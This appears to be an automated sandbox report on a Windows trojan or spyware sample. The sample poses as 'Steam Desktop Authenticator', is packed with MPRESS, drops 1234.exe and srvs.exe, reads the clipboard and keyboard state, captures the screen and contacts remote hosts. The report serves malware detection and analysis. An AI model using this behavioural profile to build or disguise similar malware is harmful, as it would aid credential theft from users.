Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.25.233.53:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.216.94.27:443 -> 192.168.2.3:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.80.20:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140011052 GetKeyboardState,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW,

System Summary:

.NET source code contains very large strings
Source: 1234.exe.0.dr, uNotepad/CollectionToSort.cs | Long String: Length: 32771
Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.cs | Long String: Length: 32771
PE file contains section with special chars
Source: srvs.exe.15.dr | Static PE information: section name:
Source: srvs.exe.15.dr | Static PE information: section name:
Source: srvs.exe.15.dr | Static PE information: section name:
Sample or dropped binary is a compiled AutoHotkey binary
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Window found: window name: AutoHotkey
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043BF6 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043C50 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043CAC NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043CD9 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140019030
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140060290
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400184C0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140004530
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400018BA
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140043AD0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140036D50
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140014FF0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400A7FF8
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140049040
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140053050
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D080
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140008140
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140083150
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400861F0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014003C220
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140042240
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014002B25C
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014000C260
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140048270
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004B270
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014008B280
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014000A2B0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400222C0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400132C0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004C2D0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400302E0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014000F2E0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014003A300
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140020316
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014005E330
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014003B32A
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014006C33D
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140033380
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140096390
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400563A0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400883F0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400B9420
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004A480
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400424B0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400414B0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400B04B4
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400344D0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140059510
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014005E580
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014002D585
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014001D5A9
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400695C0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400465D0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400665E0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140023630
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140058650
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014003B654
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400AE660
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014006D6A0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C2698
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C26B0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C26A8
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400096E0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140056719
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400577A0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400727F0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140054860
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014005E8F0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140030910
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014006C920
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140006938
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014000693C
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140006940
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004D990
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400059D0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014005F9F2
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140071A10
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140019A2E
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400BBA40
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140047AB0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140060AF0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140049B40
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400B7B9C
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014002FBFC
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140059C00
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140055C10
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014000CC10
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014005FC25
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140038C50
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004BC60
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400BDCA8
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014008BCD0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140041CD1
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140045CF0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400A7D2C
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004FD30
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014003ED70
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140079D90
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140065D90
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400A0DC0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014002ADE6
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140035E60
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140090E70
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140067E62
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140051E80
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140042E80
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140060EF0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004AF20
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014003CF20
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140010F60
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140046F70
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014001BF80
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140044FB0
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_3_009B4181
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_00CF944F
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_00CF9D5B
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0160C534
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0160E972
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0160E978
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790BB38
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790B638
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07905252
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07903E72
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07909269
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079049D8
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07902113
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07905C80
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07902C30
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790933F
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07909326
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790A68B
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790EAD0
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07908E58
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07908E48
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790A66C
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079085B8
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079095C7
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079085C8
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07904941
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079090D0
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_079090C0
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07908C38
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_0790C028
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_07908C28
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F38864
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3BDC0
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3B250
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3BD91
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3BD40
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3D0A0
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3B24B
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3D778
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 2_2_08F3D767
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 14_2_002E944F
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 14_2_002E9D5B
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_0068944F
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_00689D5B
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_0297D448
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_0297CB50
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_05D50040
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_05D5F338
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_05D52840
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_05D5D308
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_05D5D2F9
Source: C:\Users\user\AppData\Roaming\1234.exe | Code function: 15_2_05D52831
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D0631
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D0640
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D346F
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D0910
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D0933
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D0959
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D098C
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D09BB
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | Code function: 21_2_031D09A5
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 00000001400A6D70 appears 354 times
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 0000000140086C40 appears 51 times
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 00000001400A4F28 appears 34 times
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 00000001400A9358 appears 45 times
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 0000000140035BF0 appears 107 times
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 0000000140035870 appears 77 times
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: String function: 00000001400C2598 appears 38 times
Source: Nb2HQZZDIf.exe | Static PE information: invalid certificate
Source: Nb2HQZZDIf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Nb2HQZZDIf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Nb2HQZZDIf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Nb2HQZZDIf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1234.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: srvs.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exe, 00000000.00000000.201173150.000000014015E000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307447286.0000000002D80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.308499274.0000000005560000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307537646.0000000002D98000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOtxiH.exe2 vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exeBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs Nb2HQZZDIf.exe
                      Source: 1234.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Nb2HQZZDIf.exeStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00032224103
                      Source: srvs.exe.15.drStatic PE information: Section: ZLIB complexity 0.999643083756
                      Source: srvs.exe.15.drStatic PE information: Section: .vimp0 ZLIB complexity 0.997845143779
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/60@15/8
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C22C0 GetDiskFreeSpaceW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile created: C:\Users\user\AppData\Roaming\fieldJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile created: C:\Users\user\AppData\Local\Temp\tmp253A.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\1234.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\1234.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Nb2HQZZDIf.exeVirustotal: Detection: 22%
                      Source: Nb2HQZZDIf.exeReversingLabs: Detection: 25%
Source: unknown | Process created: C:\Users\user\Desktop\Nb2HQZZDIf.exe 'C:\Users\user\Desktop\Nb2HQZZDIf.exe'
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe C:\Users\user\AppData\Roaming\1234.exe 1234
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe {path}
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe {path}
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Local\Temp\srvs.exe 'C:\Users\user\AppData\Local\Temp\srvs.exe'
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe C:\Users\user\AppData\Roaming\1234.exe 1234
Source: C:\Users\user\AppData\Roaming\1234.exe | Process created: C:\Users\user\AppData\Roaming\1234.exe {path}
